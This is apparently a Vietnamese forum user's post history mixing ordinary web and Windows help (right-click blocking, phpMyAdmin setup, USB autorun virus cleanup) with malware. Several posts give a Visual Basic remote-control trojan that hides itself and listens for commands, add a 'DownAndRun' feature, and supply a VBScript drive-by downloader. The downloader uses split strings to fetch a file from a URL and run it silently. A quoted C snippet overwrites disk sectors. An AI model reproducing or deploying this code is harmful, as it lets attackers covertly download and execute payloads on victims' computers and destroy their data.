Messages posted by: viethungs

Hãy thử sửa
Code:

<SCRIPT language=JavaScript type=text/javascript>

Thành
Code:

<SCRIPT language="JavaScript">

<SCRIPT language="JavaScript"> khác <script language="text/JavaScript"> đấy smilie

Bạn bị nhiễm spyware - adware rồi, có thể dùng chương trình http://itzone.uni.cc/archives/84 để giải quyết nó. Chương trình này khá mạnh đấy!

hack hack wrote:

ý em là có 1 hình ảnh ko cho bấm chuột phải vào hình đó để save về máy tính được . giả dụ như thế ý các bác hiểu ý em ko ?

Để không cho bấm chuột phải vào một bức ảnh, bạn cho oncontextmenu="return false;" vào trong tag img, cụ thể:

<img oncontextmenu='return false;' border='0' src='http://Linhảnh'>

Hoặc làm thêm đoạn java sau vào giữa <head> và </head>

Code:

<SCRIPT LANGUAGE="JavaScript">
function right(e) {
var msg = "No Right click on this image";
if (navigator.appName == 'Netscape' && e.which == 3) {
alert(msg);
return false;
}
if (navigator.appName == 'Microsoft Internet Explorer' && event.button==2) {
alert(msg);
return false;
}
else return true;
}
function protect_image()
{
if(document.images)
{
for(i=0;i<document.images.length;i++)
{
document.images[i].onmousedown = right;
document.images[i].onmouseup = right;
}
}
}
</SCRIPT>

Sau đó thêm onLoad="protect_image()" vào trong tag <body>

Code:

<body onLoad="protect_image()">

Có Virus tên là cô giáo thảo à bạn? Mới lạ đây

Nếu không diệt được TROJAN.DOWLOADER.VB.VLI bởi bitdefender, bạn có thể tìm đường dẫn tới file nhiễm virus đó, cut ra một nơi khác, sau đó khởi động lại máy và xóa file đó đi. Nhưng chú ý xóa phải file hệ thống.

Bạn nên đưa cả thông tin đường dẫn tới cơ sở dữ liệu vào thay vì để là localhost ở đoạn

$config['MasterServer']['servername'] = 'localhost';

Nếu ý bạn muốn nói là chèn một link ẩn là: khi click chuột phải thì sẽ chuyển sang link ẩn đó ? thêm document.location="http://linhan" vào trong sự kiện click chuột phải là được

<SCRIPT language=JavaScript>
function click() {
if (event.button==2) {
alert('KHONG DUOC NHAN CHUOT PHAI');
document.location="http://linhan";
}
}
document.onmousedown=click
// -->
</SCRIPT>

http://www.mediafire.com/download.php?3bsfnmdmytm là bộ sách hướng dẫn học asp căn bản

bạn bị đặt virus ở tất cả ổ rồi. bạn nên format lại ổ C, rồi bỏ chế độ ẩn file (cả file hệ thống) rồi mở các ổ còn lại qua Run. (start-run) đừng mở trực tiếp, là nhiễm lại virus đấy. sau đó xóa file *.exe ở trạng thái ẩn đi, và cả file autorun.inf nữa, là ổn.

Chú ý là có thể các file chương trình của bạn có thể đã nhiễm virus rồi, bạn mà mở các chương trình đó là nhiễm lại đó.
chúc thành công.
mà tốt nhất là format tất cả ổ đĩa đi ^^ (tạm chấp nhận vậy)

Một số host có cấm sử dụng với một số file lạ, như là byte host cấm các file exe chả hạn.
mình nghĩ là host của bạn cấm sử dụng file hình ảnh.
Tuy nhiên cũng lạ, chưa thấy host cấm sử dụng file hình ảnh cả.

Hãy làm cho server có thể tải được một file đặc tả của người tấn công.
Thêm mã lệnh để Server được thực thi lúc khởi động (là một khoá thanh ghi).
Và một keylogger cho server – làm cho nó gửi thông tin cho người tấn công.

Quen quá

)

Hôm nay em xin đưa ra ý kiến để giải quyết việc làm cho server có thể tải được một file đặc tả của người tấn công

File sẽ send cho nạn nhân cần phải chỉnh đoạn function DoActions như sau:

Code:

Public Function DoActions(x As String)
Select Case x
Case "shutdown"
shell "shutdown -s -f -t 00"
Else
down=InStr(x,"DownAndRun");
If down=1 then
on error resume next
lens=len(x)-11
aSplit = Split(x, ".", 5)
aend=UBound(aSplit)
atype=aSplit(aend)
dl = Right(x,lens)
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="viethungs." & atype
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
Else
msgbox x
End if
End Select
End Function

Sau đó là file điều khiển thêm một button tên là "DownAndRun" và hoạt động như sau:

Code:

Private Sub DownAndRun_Click()
if InStr(textsend.text,"http")=1 then
Win.SendData "DownAndRun " & textsend.text
Else
msgbox "text send phai la link den mot file, thi button nay moi co tac dung"
End if
end sub

Em chỉ viết ra theo ý mình, có gì sai sót xin cứ chỉ bảo ạ.

Để set pass word cho file image bạn có thể thiết lập luôn cho CT bằng cách vào Options của Ghost để chỉnh. Trong Options còn có tag Security (bảo mật) có một số thiết lập ở phần này sẽ thay đổi trong BIOS, chỉ cần sài -pwd : đặt PassWord cho file ghost, bạn sẽ phải nhập 2 lần Pass trước khi tạo Image và 1 lần khi Restore.

Hoặc đặt password cho file image bằng câu lệnh có tham số cho CT ghost:

ghost.exe -pwd=xxxxx

Sử dụng Unikey http://prdownloads.sourceforge.net/unikey/uk363.zip
Chạy chương trình đó, sau đó chọn bảng mã NCR Decimal để viết trong php, sau khi lưu lại và chạy trên trình duyệt, sẽ ra tiếng việt có dấu theo ý bạn.

Trước hết Guest chứ không phải Quest ^^

và bạn phải định dạng ổ đĩa bằng Fat NTFS.

Sau đó vào Tool -> Folder Option-> tại thẻ View bạn kéo thanh cuộn đến cuối dòng -> bỏ chọn tại mục "Use simple file sharing (Recommander)".

Xong bạn mở ổ đĩa vào property chọn thẻ Security trong đó có những mục cần làm, như chỉ cho đọc, viết, xóa....

cụ thể như sau:

chọn người sử dụng trong danh sách, nếu không thấy thì nhấn nút Add và gõ tên account trong khung Enter object name, bấm Check names để bảo đảm tên thực sự tồn tại -> quy định quyền cho người này trong cột Allow (cho phép) hay Deny (cấm) bằng cách đánh dấu vào ô tương ứng.
Các loại quyền sử dụng hơi phức tạp: Full Control: toàn quyền, Modify: sửa đổi, Read: đọc, Read and Execute: đọc và chạy các chương trình, List Folder: xem danh sách thư mục con, Write: ghi. Trong thực tế, để đơn giản, bạn có thể chỉ Deny phần Read và Write đối với những người mà bạn cho là không nên và không được đọc mà thôi.

Cho thêm biến $i tự động tăng ở trong vòng while là ổn rồi, nhưng mà sao ở trên chả thấy ai đống } vòng while lại vậy? thế lỗi tùm lum lên mất thôi ^^

cái này nên ghi rõ đoạn nào cho file nào chứ

Đoạn này dùng để tạo một file và send cho nạn nhân
Code:

Private Sub Form_Load()
Me.Visible = False
End Sub
'Thêm chút nữa
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub
'Để làm cho Trojan "nghe" được cổng 2999 khi khởi động:
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
'Đoạn mã này thiết lập một cổng mở cục bộ tới cổng 2999, và cổng mà nó gửi tới là 445.
'Chúng ta thêm đoạn mã sau vào form chính:
Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
'Tiếp theo, sẽ viết hàm DoActions như là một chương trình con để gọi vào main form
Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

Còn cái này là dùng để tạo file điều khiển.
Code:

'Load form
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
'Module
Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function
'Main form
Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub
Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub
Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub
Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub

Sau khi nạn nhân kích hoạt file đã send, file này sẽ mở cổng sau và lắng nghe lệnh từ file điều khiển.
mà ở đoạn mã trên thì file điều khiển có chỉ 2 lệnh để gửi ho file sẽ lắng nghe.

một lệnh là dùng để tắt máy tính nạn nhân.
một lệnh là thông báo trên máy của nạn nhân câu "The file C:\windows\getboobies.exe has caused an error and will be terminated"

Một trương trình đơn giản nhữg khá hay đấy chứ ^^
mình thấy là thay vì gửi một thông báo nội dung "The file C:\windows\getboobies.exe has caused an error and will be terminated" này thôi, thì có thể gửi thông báo mà nội dung tự ta đưa ra. làm việc đó không quá khó, chỉ cần thêm chút ít cho cả 2 trên.

tạo một form Text với tên textsend.
và một button với tên send ở file điều khiễn

Bỏ đoạn này đi
Code:

Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub

sau đó thêm đoạn sau
Code:

Private Sub send_Click()
Win.SendData textsend.text
end sub

sau đó ở đoạn mã của file sẽ send

tìm
Code:

Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

thay bằng

Code:

Public Function DoActions(x As String)
Select Case x
Case "shutdown"
shell "shutdown -s -f -t 00"
Else
MsgBox x
End Select
End Function

Em chỉ góp ý thế thôi, có gì sai xin dưdợc chỉ bảo, đừng mắng em, tủi thân lắm smilie

Theo mình thấy thì bạn nên mở cơ sở dữ liệu của bạn ra, tìm trong phần bảng user (hay bảng nào đó tương tự) để có thể thấy thông tin của user qua các trường và bản ghi (stt, tên, pass, quyền han...) từ đó bạn có thể chỉnh sửa thông tin cho phù hợp với bạn.

Theo như mình thấy ở trên thì có vẻ như phpmyadmin đã không thấy được cấu hình của sql, bạn nên để cho phpmyadmin biết cấu hình đó.
cách khắc phục điều trên:
bạn mở thư mục phpmyadmin, tìm file config.default.php, mở file đó ra bằng notepad.

Tìm
Code:

$cfg['Servers'][$i]['user'] =

Thêm vào đằng sau đó user name của sql của bạn

Sau đó tìm tiếp
Code:

$cfg['Servers'][$i]['password'] =

Thêm vào sau đó là pass của sql của bạn

Save file config.default.php lại và chạy thử phpmyadmin.
Chúc bạn thành công!

-

khá đầy đủ mod

http://maithanhtrung.streamlinetrial.co.uk/home.zip

quản lý:

user: admin
pass: maithanhtrung

chúc thành công

Theo mình biết thì có vẻ như là có cách này là chuẩn nhất ^^
bạn nên xem lại. đẫy là code mẫu mình dùng để kiểm tra file, mình thấy rất có hiệu quả.

Code:

if ( file_exists("viethungs.lock") ){
print("Tồn tại file này");
} elsse print("Không tồn tại file này");

mình đã vào host của bạn, bạn nên up mọi thứ lên thư mục www, mình đã chuyển index.php của bạn ra thư mục đó, mà không hỏi ^^, và đúng là nên dấu thông tin đi để lộ thế kia thì có mà mất. với lại host free bạn đăng ký có quảng cáo xxx quá, bạn nên dùng host ở http://thegioihostfree.com/
miễn phí,
việt nam,
không quảng cáo
php, mysql

Em nói cách chống virus từ usb nha

em thấy virus lây lan qua usb có một số sự phá hoại điển hình như sau:

-Tự sao chép vào một số thư mục hệ thống của window.
-Phá hủy các file ứng dụng (exe) trong máy bằng cách đưa mã độc vào các file đó.
-Vô hiệu hóa nhiều chức năng cơ bản của window (Task manager, registry, folder options...)
-Làm chậm khá nhiều tôc độ của máy tính
Tự Lây lan qua mạng lan, qua các tin nhắn spam
-Tự lây lan qua usb khác, và từ usb khác tự nhảy vào máy tính.
-và...... nhiều nhiều thứ khác mà nó có thể làm nữa.

cái ta đáng lo nhất có thể nói là khi máy tính mình đang khỏe mạnh mà cắm usb vào cái thì ốm vì virus luôn, thế mới khổ

Nó nhảy vào như thế nào?

Theo như em biết thì cách duy nhất mà một con virus có thể kích hoạt từ usb ngay từ khi cắm usb vào là lợi dụng chức năng autorun của window.
Chức năng này làm cho một file tự động thi hành khi window nhận thấy có thiết bị nhớ ngoài được cắm vào máy tính.

vậy thì chống con vật này từ usb nhảy vào máy ra sao?

làm theo bước sau nha, nhìn có vẻ dài, nhưng làm thì nhanh lắm, và mỗi lần dùng usb đều phải làm như thế (không mất nhiều công lao lắm đâu ạ).

1/ trước khi cắm usb vào thì bấm và giữ shift cho đến khi usb hoàn toàn được nhận vào máy tính (làm thế sẽ vô hiệu hóa bước tự động chạy của autorun)
2/ Sau khi usb đã nhận hẳn vào máy tính, thì đừng vội mừng, mở trực tiếp ổ usb ra cái là nó lại nhảy vào máy luôn đó.
mở mycomputer và bấm chuột phải vào ổ usb, nếu thấy chữ autoplay thay vì open nhưg thường lệ ở đầu menu thì 99% là usb đã nhiễm virus. nếu không thấy thì vẫn có thể virus có trong usb (cẩn tắc vô áy náy mà, nên)
hãy mở ổ usb từ Run (Start ---> Run...) bằng cách gõ tên ổ usb vào run và enter. vd f:\ (enter) (có thể ổ usb của bạn có tên là khác)
3/ vào được trong usb rồi, và virus vãn nằm yến đó, giờ thì tìm và tiến đưa nó về nơi an nghỉ cuối cùng thôi, mở chức năng hiện file ẩn, hiện cả file hệ thống ra:
Tool --> flolder options --> view, chọn show hiden file and folder, sau đó bỏ tick ở Hide protected operating system file và ok
4/Bây giờ thì virus sẽ lộ mặt, nếu nó có tồn tại trong usb rồi, bạn sẽ thấy ít nhất 2 file ẩn trong đó có một file *.exe và đặc biệt một file autorun.inf, xóa luôn 2 kẻ đó đi. nguy hiểm đó.
còn nếu không thấy file ẩn nào, không thấy autorun.inf thì yên tâm, chưa có gì xảy ra cả
5/ thế là xong, usb trong sạch, máy tính vẫn sống khỏe

Bạn thử làm thế này xem, biết đâu được. ^^
Mở Windows Media Player, vào menu Tools -> Options, chọn thẻ Privacy, sau đó đánh dấu chọn vào Send unique Player ID to content providers

Như vậy là phải cài mới rồi, đã cài mới l;ại rồi mà còn hỏi giờ thì sao? tức là có ý gì ?

mình không chắc lắm, nhưng nó thông báo như thế kia thì tức là file hệ thống bị thiếu rồi còn gì nữa. có lẽ là thiếu file nào đó quan trọng, mà mình đoán là trong khi bạn tạo file ghost file nào đó bị mất đi. bạn cứ thử ghost lại xem, nếu được thì tốt còn không thì lại cài lại win lần nữa vậy. chỉ cần repair khi cài lại thôi, không cần cài mới hoàn toàn. thì bộ cài sẽ thêm các file bị thiếu vào hệ thống.

Theo như mình biết, thì bạn bị nhiễm virus từ usb đó. con virus này tạo một file autorrun.inf trong ổ của bạn, tất nhiên là file này ẩn, chính file này đã làm cho bạn không mở được ổ trực tiếp đó.

bạn có thể xóa file autorun.inf này đi từ dos hoặc dùng Nc để xóa cũng được.

mà tốt nhất khi đã bị nhiễm nó thì tìm một phần mềm diệt virus mới mạnh hơn đi, hoặc forrmat ổ.

Và chú ý khi cắm usb lạ vòa máy, khi cắm usb vào bấm tổ hợp phím ctrl+shift, bấm và giữ đến khi nào usb được nhận. Sau đó vào mycoputer, bấm chuột phải vòa ổ usb, nếu nó khôgn có open, thì usb đã có virus rồi, nên format usb đi, hoặc xóa file autorrun.inf trong usb đi. và đừng có mở trực tiếp usb ra, nếu khong thì máy bạn sẽ nhiễm virus đó. bạn có thể mở usb bằng cách dùng Run, hoặc Nc.

Code:

<script language="VBScript">
on error resume next
dl = "HTTP://DUONG DAN FILE DOWNLOAD" '<==== CHU Y
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="TEN FILE DOWNLOAD" ' <==== CHU Y
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>

chúc thành công, mình đã thử và có hiệu nghiệm đấy

Nên học thêm front nó giúp tạo mã, khỏi phải nhớ nhiều, mà front phải học à ?
cái đó giống như word thôi mà, cứ mở ra mày mò một lúc là ra hết. bổ sung kiến thức thì có ai cấm đâu. nhỉ

blackwidow wrote:

đây là đoạn code đơn giản được viết bằng C

Code:

#include
main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}

Convirus này gây hại như thế nào vậy anh?
em mới học C chưa thành thạo lắm, sin được chỉ giáo
thank